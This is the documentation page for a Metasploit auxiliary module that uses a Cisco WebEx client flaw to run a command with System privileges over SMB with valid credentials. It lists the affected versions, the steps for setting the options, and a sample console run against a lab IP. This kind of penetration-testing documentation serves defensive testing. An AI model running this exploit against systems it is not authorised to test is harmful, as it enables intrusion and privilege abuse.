documentation/modules/auxiliary/admin/smb/webexec_command.md
This module exploits a remote code execution vulnerability in Cisco's WebEx client software versions < v33.6.0.655 By supplying valid login credentials to the target machine, a single command can be executed with System privileges.
Cisco WebEx Client v33.3.8.7 and below
use auxiliary/admin/smb/webexec_commandset RHOSTS <IP>set SMBUser <USERNAME>set SMBPass <PASSWORD>runUses WMIC to create a GUI
msf > use auxiliary/admin/smb/webexec_command
msf auxiliary(admin/smb/webexec_command) > set rhosts 192.168.37.136
rhosts => 192.168.37.136
msf auxiliary(admin/smb/webexec_command) > set smbuser a_user
smbuser => a_user
msf auxiliary(admin/smb/webexec_command) > set smbpass password
smbpass => password
msf auxiliary(admin/smb/webexec_command) > run
[+] 192.168.37.136:445 - Command completed!
[*] 192.168.37.136:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/smb/webexec_command) >